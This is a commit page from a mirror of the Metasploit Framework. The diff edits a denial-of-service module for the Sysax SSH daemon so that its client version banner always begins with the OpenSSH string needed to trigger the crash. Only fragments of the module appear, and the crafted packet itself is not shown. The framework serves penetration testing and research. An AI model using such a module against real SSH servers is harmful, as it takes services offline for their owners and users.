infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Code Review Feedback 

made the CLIENTVERSION always include the "SSH-2.0-OpenSSH_5.1p1 " to trigger DoS
unstable
Matt Andreko 2013-04-08 10:58:35 -04:00
parent 4c8e19ad1a
commit f96baa7e7e
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb
View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
Opt::RPORT(22),
OptString.new('CLIENTVERSION', [ true, 'The SSH client version to report.', 'SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1'])
OptString.new('CLIENTVERSION', [ true, 'The SSH client version to report.', 'Debian-5ubuntu1'])
], self.class)
end
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
banner = sock.get_once(-1, 10) || ''
print_status("Banner: #{banner.strip}")
sock.put(datastore['CLIENTVERSION'] + "\r\n" + get_packet())
sock.put("SSH-2.0-OpenSSH_5.1p1 " + datastore['CLIENTVERSION'] + "\r\n" + get_packet())
# Sometimes the socket closes faster than it can read, sometimes it doesn't, so catch the error just in case.
begin